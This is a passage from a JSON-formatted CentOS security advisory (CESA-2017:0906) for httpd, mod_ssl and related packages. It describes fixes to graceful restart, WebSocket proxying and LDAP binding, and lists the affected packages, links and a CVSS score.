graceful restart could take a long time to complete. With this update, httpd has been fixed to limit the number of connections opened during a graceful restart to the number of active children, and the described problem no longer occurs. (BZ#1420002)\n\n* Previously, httpd running in a container returned the 500 HTTP status code (Internal Server Error) when a connection to a WebSocket server was closed. As a consequence, the httpd server failed to deliver the correct HTTP status and data to a client. With this update, httpd correctly handles all proxied requests to the WebSocket server, and the described problem no longer occurs. (BZ#1429947)\n\n* In a configuration using LDAP authentication with the mod_authnz_ldap module, the name set using the AuthLDAPBindDN directive was not correctly used to bind to the LDAP server for all queries. Consequently, authorization attempts failed. The LDAP modules have been fixed to ensure the configured name is correctly bound for LDAP queries, and authorization using LDAP no longer fails. (BZ#1420047)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-April/022380.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-tools\nmod_ldap\nmod_proxy_html\nmod_session\nmod_ssl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-0906.html", "modified": "2017-04-13T10:59:52", "published": "2017-04-13T10:59:52", "id": "CESA-2017:0906", "href": "http://lists.centos.org/pipermail/centos-announce/2017-April/022380.html", "title": "httpd, mod_ldap, mod_proxy_html, mod_session, mod_ssl security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}